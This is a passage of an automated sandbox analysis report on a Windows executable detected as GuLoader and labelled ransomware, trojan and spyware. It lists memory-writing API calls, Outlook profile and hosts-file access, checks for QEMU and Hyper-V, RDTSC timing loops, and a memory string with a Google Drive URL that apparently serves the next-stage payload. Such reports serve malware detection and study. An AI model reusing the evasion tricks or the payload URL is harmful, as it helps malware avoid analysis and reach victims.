    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD05F3 NtWriteVirtualMemory,0_2_02AD05F3
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD47D0 NtWriteVirtualMemory,0_2_02AD47D0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD4F3F NtWriteVirtualMemory,0_2_02AD4F3F
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD4935 NtWriteVirtualMemory,0_2_02AD4935
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD7D4A NtWriteVirtualMemory,0_2_02AD7D4A
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 22_2_0056A07B Sleep,LdrInitializeThunk,NtProtectVirtualMemory,22_2_0056A07B
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 22_2_00569F61 LdrInitializeThunk,NtProtectVirtualMemory,22_2_00569F61
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 22_2_00569F54 LdrInitializeThunk,NtProtectVirtualMemory,22_2_00569F54
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 22_2_00569F1A LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,22_2_00569F1A
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 22_2_00569F18 LdrInitializeThunk,NtProtectVirtualMemory,22_2_00569F18
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess Stats: CPU usage > 98%
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000000.222100367.000000000041D000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFirnificat.exe vs SecuriteInfo.com.__vbaHresultCheckObj.22789.exe
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000000.501841988.000000000041D000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFirnificat.exe vs SecuriteInfo.com.__vbaHresultCheckObj.22789.exe
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exeBinary or memory string: OriginalFilenameFirnificat.exe vs SecuriteInfo.com.__vbaHresultCheckObj.22789.exe
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exeVirustotal: Detection: 23%
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exeReversingLabs: Detection: 15%
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe'
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe'
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe' Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@3/2@2/3
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000000.00000002.503499325.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_00404CE7 push ebp; iretd 0_2_00404CE8
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_00403391 pushad ; retf 0_2_00403392
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

    Malware Analysis System Evasion:

    barindex
    Tries to detect Any.runShow sources
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000002.503555930.0000000003370000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=16HJEQVA7VECQQXWXMEW5I0BX_HPCAORFWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000002.503555930.0000000003370000.00000004.00000001.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeRDTSC instruction interceptor: First address: 000000000040BD3F second address: 000000000040BD3F instructions: 0x00000000 rdtsc 0x00000002 cmp bh, FFFFFFB8h 0x00000005 xor eax, edx 0x00000007 cmp al, F9h 0x00000009 dec edi 0x0000000a cmp esi, 000000C9h 0x00000010 fabs 0x00000012 jmp 00007F9C1C38B0F5h 0x00000014 cmp edi, 00000000h 0x00000017 jne 00007F9C1C38B016h 0x0000001d cmp cl, FFFFFFA5h 0x00000020 mov ebx, EA4B6B4Eh 0x00000025 cmp cx, 0065h 0x00000029 xor ebx, 08A587D2h 0x0000002f cmp ecx, 59h 0x00000032 xor ebx, 9719A8D1h 0x00000038 cmp bx, 005Ch 0x0000003c fldpi 0x0000003e jmp 00007F9C1C38B0F3h 0x00000040 xor ebx, 75B7444Dh 0x00000046 cmp ah, FFFFFFF0h 0x00000049 cmp ch, FFFFFFA0h 0x0000004c rdtsc
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe TID: 6908Thread sleep count: 71 > 30Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe TID: 6912Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe TID: 6912Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD8186 rdtsc 0_2_02AD8186
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeWindow / User API: threadDelayed 1144Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeWindow / User API: threadDelayed 8856Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeThread delayed: delay time: 60000Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeThread delayed: delay time: 60000Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeSystem information queried: ModuleInformationJump to behavior
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000002.503555930.0000000003370000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=https://drive.google.com/uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorFwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000002.503555930.0000000003370000.00000004.00000001.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732485311.0000000000924000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW0000

    Anti Debugging: